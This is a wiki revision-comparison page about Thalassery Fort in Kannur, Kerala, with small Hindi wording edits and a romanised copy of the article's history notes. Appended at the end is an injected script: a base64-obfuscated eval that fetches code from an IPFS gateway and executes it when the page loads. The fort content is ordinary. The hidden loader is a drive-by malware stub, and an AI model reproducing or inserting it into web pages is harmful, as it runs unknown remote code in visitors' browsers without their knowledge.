Difference between revisions of "थलस्सरी क़िला कन्नूर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:Thalasseri-Fort-Kannur.jpg|thumb|250px|थलस्सरी क़िला, [[कन्नूर]]<br />Muzhappilangad Beach, Kannur]]
+
[[चित्र:Thalasseri-Fort-Kannur.jpg|thumb|250px|थलस्सरी क़िला, [[कन्नूर]]]]
*[[केरल]] के शहर [[कन्नूर]] में कई [[कन्नूर पर्यटन|पर्यटन स्थल]] है जिनमें से एक थलस्सरी क़िला है।  
+
'''थलस्सरी क़िला''' [[केरल]] राज्य के [[कन्नूर]] शहर के [[कन्नूर पर्यटन|पर्यटन स्थलें]] में से एक थलस्सरी क़िला है।  
*इतिहास के अनेक उतार-चढ़ाव का गवाह यह क़िला पर्यटकों को काफ़ी पसंद आता है।  
+
*[[इतिहास]] के अनेक उतार-चढ़ाव का गवाह यह क़िला पर्यटकों को काफ़ी पसंद आता है।  
 
*थलस्सरी नगर के थिरूवल्लपद हिल पर यह क़िला बना हुआ है जो दक्षिणी कन्नूर से 20 किलोमीटर दूर है।  
 
*थलस्सरी नगर के थिरूवल्लपद हिल पर यह क़िला बना हुआ है जो दक्षिणी कन्नूर से 20 किलोमीटर दूर है।  
*इस क़िले का निर्माण ब्रिटिश [[ईस्ट इंडिया कंपनी]] ने 1708 ई. में करवाया था।  
+
*थलस्सरी क़िले का निर्माण ब्रिटिश [[ईस्ट इंडिया कंपनी]] ने 1708 ई. में करवाया था।  
 
*लाल ईटों से बना यह क़िला दो एकड़ क्षेत्र में फैला हुआ है।  
 
*लाल ईटों से बना यह क़िला दो एकड़ क्षेत्र में फैला हुआ है।  
 
*[[अंग्रेज़]] इस क़िले का उपयोग टकसाल और कारागार के तौर पर करते थे।  
 
*[[अंग्रेज़]] इस क़िले का उपयोग टकसाल और कारागार के तौर पर करते थे।  
 
*[[हैदर अली]] की सेना के अनेक नेताओं को यहाँ कैद किया गया था।  
 
*[[हैदर अली]] की सेना के अनेक नेताओं को यहाँ कैद किया गया था।  
 
*क़िले के निकट ही सेन्ट जॉन चर्च है, जहाँ एडवर्ड ब्रेन्नन ने आराम किया था।
 
*क़िले के निकट ही सेन्ट जॉन चर्च है, जहाँ एडवर्ड ब्रेन्नन ने आराम किया था।
{{प्रचार}}
+
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=

Revision as of 10:15, 12 February 2012

[[chitr:Thalasseri-Fort-Kannur.jpg|thumb|250px|thalassari qila, kannoor]] thalassari qila keral rajy ke kannoor shahar ke paryatan sthalean mean se ek thalassari qila hai.

  • itihas ke anek utar-chadhav ka gavah yah qila paryatakoan ko kafi pasand ata hai.
  • thalassari nagar ke thiroovallapad hil par yah qila bana hua hai jo dakshini kannoor se 20 kilomitar door hai.
  • thalassari qile ka nirman british eest iandiya kanpani ne 1708 ee. mean karavaya tha.
  • lal eetoan se bana yah qila do ek d kshetr mean phaila hua hai.
  • aangrez is qile ka upayog takasal aur karagar ke taur par karate the.
  • haidar ali ki sena ke anek netaoan ko yahaan kaid kiya gaya tha.
  • qile ke nikat hi sent j aaun charch hai, jahaan edavard brennan ne aram kiya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>